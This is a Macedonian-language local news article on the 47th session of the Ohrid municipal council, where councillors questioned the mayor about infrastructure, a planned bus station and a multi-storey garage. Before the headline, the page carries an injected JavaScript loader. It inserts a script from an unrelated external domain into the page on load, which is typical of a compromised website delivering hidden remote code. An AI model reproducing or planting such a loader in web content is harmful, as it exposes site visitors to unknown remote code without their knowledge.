;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ПО НЕКОЛКУ-ЧАСОВНАТА ДЕБАТА ЗАВРШИ 47-ТА СЕДНИЦА НА СОВЕТОТ НА ОПШТИНА ОХРИД -

ПО НЕКОЛКУ-ЧАСОВНАТА ДЕБАТА ЗАВРШИ 47-ТА СЕДНИЦА НА СОВЕТОТ НА ОПШТИНА ОХРИД

Денешната 47-ма седница на Советот на општина Охрид.траеше нешто повеќе од 4 часа.  На дневниот ред, главно доминираа советничките прашања, како единствена точка на дневиот ред кој Коњаноска претходно го најави  а советниците по однапред утврден редослед поставуваа прашања до градоначалникот, локалната самоуправа и јавните претпријатија.
На седницата главно доминираа прашања од инфраструктурата, кои покриваа различни региони од општината и потребите на граѓаните. Беа поставени прашања  и за

-приоритетите во спроведувањето на инфраструктурните проекти,

– изградбата на новата автобуска станица, катните гаражи, водоводни и атмосферски инсталации,

– изработка на детални урбанистички планови

sobr.


Во најголем дел одговораше  градоначалникот Бакрачески, а за деталите поврзани со работата на јавните претпријатија одговараа нивни претставници.
Во однос на идната автобуска станица , според градоначалникот Бакрачески  постојат шпекулации за изградбата на новата автобуска станица кои се без основа а инвеститорот со потребната динамика наскоро ќе го реализира овој капитален објект за Охрид.

На седницата Исто така е потврдено дека во Охрид во овој момент е извесно дека ќе се гради само една катна гаража. Според градоначалникот Бакрачески, локалната самоуправа во реализирањето на проектите се раководи од програмата која беше презентирана пред граѓаните и од ургентноста и потребите на граѓаните.

47_sednica_400

Leave a Reply

Your email address will not be published.